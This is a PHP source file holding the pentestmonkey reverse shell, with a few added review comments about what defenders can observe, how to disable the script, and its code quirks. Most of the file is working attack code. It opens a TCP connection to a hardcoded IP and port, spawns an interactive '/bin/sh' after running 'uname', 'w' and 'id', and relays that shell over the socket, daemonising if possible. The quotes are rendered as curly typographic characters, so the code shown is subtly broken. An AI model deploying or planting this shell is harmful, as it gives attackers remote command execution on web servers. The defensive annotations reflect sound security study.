
<?php\r\n// NOTE(review): this is the pentestmonkey php-reverse-shell. What a defender can observe from it: an outbound\r\n// TCP connection from the web-server process to the hardcoded $ip:$port (fsockopen below), then a proc_open()\r\n// of $shell with that socket relayed to the child's stdin/stdout/stderr in the loop at the end of the file.\r\n// As written it is neutralised by listing proc_open, fsockopen and pcntl_fork in PHP's disable_functions\r\n// and by egress-filtering outbound connections from web hosts.\r\n// php-reverse-shell – A Reverse Shell implementation in PHP\r\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\r\n//\r\n// This tool may be used for legal purposes only. Users take full responsibility\r\n// for any actions performed using this tool. The author accepts no liability\r\n// for damage caused by this tool. If these terms are not acceptable to you, then\r\n// do not use this tool.\r\n//\r\n// In all other respects the GPL version 2 applies:\r\n//\r\n// This program is free software; you can redistribute it and/or modify\r\n// it under the terms of the GNU General Public License version 2 as\r\n// published by the Free Software Foundation.\r\n//\r\n// This program is distributed in the hope that it will be useful,\r\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n// GNU General Public License for more details.\r\n//\r\n// You should have received a copy of the GNU General Public License along\r\n// with this program; if not, write to the Free Software Foundation, Inc.,\r\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\r\n//\r\n// This tool may be used for legal purposes only. Users take full responsibility\r\n// for any actions performed using this tool. 
If these terms are not acceptable to\r\n// you, then do not use this tool.\r\n//\r\n// You are encouraged to send comments, improvements or suggestions to\r\n// me at pentestmonkey@pentestmonkey.net\r\n//\r\n// Description\r\n// ———–\r\n// This script will make an outbound TCP connection to a hardcoded IP and port.\r\n// The recipient will be given a shell running as the current user (apache normally).\r\n//\r\n// Limitations\r\n// ———–\r\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\r\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\r\n// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.\r\n//\r\n// Usage\r\n// —–\r\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\r\n\r\nset_time_limit (0);\r\n$VERSION = “1.0”;\r\n$ip = ‘192.168.1.9’; // CHANGE THIS\r\n$port = 1234; // CHANGE THIS\r\n$chunk_size = 1400;\r\n$write_a = null;\r\n$error_a = null;\r\n$shell = ‘uname -a; w; id; /bin/sh -i’;\r\n$daemon = 0;\r\n$debug = 0;\r\n\r\n//\r\n// Daemonise ourself if possible to avoid zombies later\r\n//\r\n\r\n// pcntl_fork is hardly ever available, but will allow us to daemonise\r\n// our php process and avoid zombies. Worth a try…\r\nif (function_exists(‘pcntl_fork’)) {\r\n// Fork and have the parent process exit\r\n$pid = pcntl_fork();\r\n\r\nif ($pid == -1) {\r\nprintit(“ERROR: Can’t fork”);\r\nexit(1);\r\n}\r\n\r\nif ($pid) {\r\nexit(0); // Parent exits\r\n}\r\n\r\n// Make the current process a session leader\r\n// Will only succeed if we forked\r\nif (posix_setsid() == -1) {\r\nprintit(“Error: Can’t setsid()”);\r\nexit(1);\r\n}\r\n\r\n$daemon = 1;\r\n} else {\r\nprintit(“WARNING: Failed to daemonise. 
This is quite common and not fatal.”);\r\n}\r\n\r\n// Change to a safe directory\r\nchdir(“/”);\r\n\r\n// Remove any umask we inherited\r\numask(0);\r\n\r\n//\r\n// Do the reverse shell…\r\n//\r\n\r\n// Open reverse connection\r\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\r\nif (!$sock) {\r\nprintit(“$errstr ($errno)”);\r\nexit(1);\r\n}\r\n\r\n// Spawn shell process\r\n$descriptorspec = array(\r\n0 => array(“pipe”, “r”), // stdin is a pipe that the child will read from\r\n1 => array(“pipe”, “w”), // stdout is a pipe that the child will write to\r\n2 => array(“pipe”, “w”) // stderr is a pipe that the child will write to\r\n);\r\n\r\n$process = proc_open($shell, $descriptorspec, $pipes);\r\n\r\nif (!is_resource($process)) {\r\nprintit(“ERROR: Can’t spawn shell”);\r\nexit(1);\r\n}\r\n\r\n// Set everything to non-blocking\r\n// Reason: Occsionally reads will block, even though stream_select tells us they won’t\r\nstream_set_blocking($pipes[0], 0);\r\nstream_set_blocking($pipes[1], 0);\r\nstream_set_blocking($pipes[2], 0);\r\nstream_set_blocking($sock, 0);\r\n\r\nprintit(“Successfully opened reverse shell to $ip:$port”);\r\n\r\n// NOTE(review): relay loop. stream_select() below is called with a null timeout, so the script blocks here\r\n// until data arrives on one of the three streams; the only exits are the two feof() checks, and\r\n// $num_changed_sockets is assigned but never examined.\r\nwhile (1) {\r\n// Check for end of TCP connection\r\nif (feof($sock)) {\r\nprintit(“ERROR: Shell connection terminated”);\r\nbreak;\r\n}\r\n\r\n// Check for end of STDOUT\r\nif (feof($pipes[1])) {\r\nprintit(“ERROR: Shell process terminated”);\r\nbreak;\r\n}\r\n\r\n// Wait until a command is end down $sock, or some\r\n// command output is available on STDOUT or STDERR\r\n$read_a = array($sock, $pipes[1], $pipes[2]);\r\n$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);\r\n\r\n// If we can read from the TCP socket, send\r\n// data to process’s STDIN\r\nif (in_array($sock, $read_a)) {\r\nif ($debug) printit(“SOCK READ”);\r\n$input = fread($sock, $chunk_size);\r\nif ($debug) printit(“SOCK: $input”);\r\nfwrite($pipes[0], $input);\r\n}\r\n\r\n// If we can read from the process’s STDOUT\r\n// send data down tcp 
connection\r\nif (in_array($pipes[1], $read_a)) {\r\nif ($debug) printit(“STDOUT READ”);\r\n$input = fread($pipes[1], $chunk_size);\r\nif ($debug) printit(“STDOUT: $input”);\r\nfwrite($sock, $input);\r\n}\r\n\r\n// If we can read from the process’s STDERR\r\n// send data down tcp connection\r\nif (in_array($pipes[2], $read_a)) {\r\nif ($debug) printit(“STDERR READ”);\r\n$input = fread($pipes[2], $chunk_size);\r\nif ($debug) printit(“STDERR: $input”);\r\nfwrite($sock, $input);\r\n}\r\n}\r\n\r\nfclose($sock);\r\nfclose($pipes[0]);\r\nfclose($pipes[1]);\r\nfclose($pipes[2]);\r\nproc_close($process);\r\n\r\n// Like print, but does nothing if we’ve daemonised ourself\r\n// (I can’t figure out how to redirect STDOUT like a proper daemon)\r\n// NOTE(review): $daemon is read here without a global declaration, so inside this function it is always\r\n// undefined (falsy) and the message is printed regardless of whether the script daemonised; the output goes\r\n// wherever print() output lands for the running SAPI (presumably the HTTP response for a web request).\r\nfunction printit ($string) {\r\nif (!$daemon) {\r\nprint “$string\n”;\r\n}\r\n}\r\n\r\n?>\r\n\r\n \r\n\r\n \r\n
